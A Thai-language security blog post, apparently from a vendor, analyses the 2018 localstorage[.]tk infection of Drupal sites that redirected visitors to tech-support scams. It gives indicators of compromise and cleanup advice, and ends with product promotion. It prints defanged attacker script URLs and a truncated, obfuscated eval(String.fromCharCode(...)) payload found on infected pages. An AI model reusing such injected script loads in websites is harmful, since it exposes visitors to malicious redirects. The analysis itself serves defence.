ฤดูใบไม้ผลิปี 2018 จำนวนผู้ติดเชื้อที่เพิ่มขึ้นอย่างน่าประหลาดใจจากช่องโหว่ของ Drupal เมื่อถือว่าเป็นหนึ่งใน CMS ที่ปลอดภัยที่สุดในบรรดา CMS:WordPress และ Joomla และรองรับธุรกิจจำนวนมากทั่วโลก Drupal เพิ่งถูกโจมตีที่เป็นอันตรายอีกครั้ง

ผู้ใช้ Drupal กำลังจัดการกับการติดเชื้อที่เพิ่มขึ้นอย่างมาก โดยล่าสุดเป็นการโจมตีพื้นที่จัดเก็บในตัวเครื่อง [.tk] การติดเชื้อส่งผลกระทบต่อเว็บไซต์ Drupal หลายพันแห่งโดยเปลี่ยนเส้นทางผู้ใช้ไปยังกลโกง “Tech Support” ผ่าน “js.localstorage[.]tk”

การ Drupal การติดเชื้อ

การใช้ประโยชน์จาก Drupal นี้แสดงผ่านโค้ด JavaScript ที่เป็นอันตราย ซึ่งถูกแทรกเข้าไปใน .tpl.php ต่างๆ , .html.twig และ .js ไฟล์. สคริปต์ที่เป็นอันตรายถูกแทรกจาก hxxps://js.localstorage[.]tk/s.js?crt=new หรือโหลดจาก hxxp://193.201.24 .233/m.js?d=3 ซึ่งนำไปสู่การเปลี่ยนเส้นทางที่เป็นอันตราย นอกจากนี้ โค้ดดังกล่าวยังแทรกสคริปต์ที่เป็นอันตรายไปยังตำแหน่งอื่นๆ มากมายภายในฐานข้อมูล

[code inline="true" scrollable="true"]eval (String .fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, ...skipped... 100, 40, 122, 41, 59));
[/code]

Drupal:หน้าที่ติดไวรัสมีโค้ด JavaScript ด้านบน

การกำจัดโค้ด JavaScript ที่เป็นอันตรายเหล่านี้ออกจากไฟล์และฐานข้อมูลอาจไร้ประโยชน์ เนื่องจากแฮกเกอร์ได้สร้างไฟล์ขึ้นเพื่อติดไฟล์อีกครั้งในกรณีที่สงสัยว่าไฟล์เหล่านั้นสะอาด ไฟล์เหล่านี้มักมีชื่อไฟล์แบบสุ่ม เช่น “g.php ","tonure.php ” หรือ “jooner.php ”.

ต่อไปนี้เป็นรหัสหัวฉีดมัลแวร์ที่แทรกไฟล์ Javascript ที่เป็นอันตรายลงใน .tpl.php , .html.twig , header.php, และ drupal.js ไฟล์.

อาการทั่วไปบางประการของ Massive localstorage[.]tk Drupal Infection ได้แก่:

1. ไฟล์ Index.php ถูกสร้างขึ้นในไดเร็กทอรีย่อยซึ่งไม่ควรเป็น
2. ค้นพบไฟล์ที่น่าสงสัยในไฟล์สาธารณะและโฟลเดอร์ที่มีชื่อไฟล์แบบสุ่ม เช่น “g.php”, “tonure.php”, “jooner.php” หรือ stats.php นอกจากนี้ ความสงสัยอาจเกิดขึ้นเมื่อพบไฟล์ .ico และไฟล์ PHP ที่มีชื่อฐานสิบหกที่น่าสงสัย
3. การค้นพบไฟล์ที่มีอักขระแบบสุ่มที่มีนามสกุล .ico และสิทธิ์อนุญาตของ index.php 0755 โดยรวมอยู่ใน .ico ในทุกไดเร็กทอรีและไดเร็กทอรีย่อยของไซต์จาก public_html
4. พบข้อผิดพลาดเซิร์ฟเวอร์ 500 รายการบนเซิร์ฟเวอร์ที่ใช้งาน SuPHP เนื่องจากเปลี่ยนสิทธิ์ใน public_html เป็น 777
5. การอ้างอิงสคริปต์การแฮ็กในฐานข้อมูล เช่น การเกิด %localstorage% อ้างอิงในฐานข้อมูล

การบรรเทาผลกระทบจาก Drupal Exploit:localstorage[.]tk Infection

แม้ว่าความเสียหายจะเกิดขึ้นแล้วก็ตาม การปฏิบัติตามชุดกลยุทธ์การบรรเทาผลกระทบที่ประสานกันไว้สามารถต่อต้านการเจาะช่องโหว่เพิ่มเติมและบรรเทาช่องโหว่ของ Drupal ได้ คุณสามารถใช้ขั้นตอนต่อไปนี้เพื่อลบการติดไวรัส Drupal และลดช่องโหว่ในอนาคต:

1. อัปเกรดเวอร์ชัน Drupal: เพื่อล้างการติดเชื้อนี้ ขอแนะนำให้แก้ไขและอัปเกรดเป็นเวอร์ชันล่าสุดของ Drupal (อย่างน้อยเป็น Drupal 7.59, Drupal 8.5.3 หรือ Drupal 8.4.8)
2. กำจัดแบ็คดอร์ :คุณจะต้องกำจัดแบ็คดอร์ทั้งหมด (รวมถึงงาน cron ที่เป็นอันตราย) จากนั้นลบมัลแวร์ที่ฉีดออกจากไฟล์และฐานข้อมูล Drupal ที่ติดไวรัส การไม่ลบแบ็คดอร์อาจทำให้ไซต์ Drupal ของคุณรู้จักกับมัลแวร์อีกครั้ง และไฟล์ที่คุณอาจล้าง/เปลี่ยนแล้วจะติดไวรัสอีกครั้ง
3. มีโอกาสที่การเอาเชื้อออกด้วยวิธีอื่นอาจส่งผลให้ต้องฉีดซ้ำทันที ขอแนะนำให้ปฏิบัติตามคู่มือของแอสตร้า ในการทำความสะอาด Drupal Site ที่ถูกแฮ็ก
4. ทำตามคำแนะนำทีละขั้นตอนตามที่อธิบายไว้ในฟอรัม Drupal อย่างเป็นทางการ
5. ขอแนะนำอย่างยิ่งให้ใช้ไฟร์วอลล์เว็บไซต์ ซึ่งจะแก้ไขไซต์ของคุณต่อภัยคุกคามที่กำลังจะเกิดขึ้นทันที แจ้งให้คุณทราบเกี่ยวกับช่องโหว่ที่ค้นพบ หรือแจ้งให้คุณแก้ไข/อัปเดตไซต์ของคุณทันทีที่มีการเผยแพร่แพตช์/เวอร์ชัน

กำลังมองหาการรักษาความปลอดภัยที่รั่วซึมสำหรับไซต์ Drupal ของคุณจากการโจมตีออนไลน์ดังกล่าวใช่หรือไม่ สมัคร Drupal Securit Suite ของ Astra เพื่อรับรองความปลอดภัยในขณะที่คุณทำธุรกิจ

หากต้องการความช่วยเหลือในทันที dส่งข้อความถึงเราบนวิดเจ็ตแชท

ดาวน์โหลด Astra's Guide to Secure Coding Practices Checklist for Developers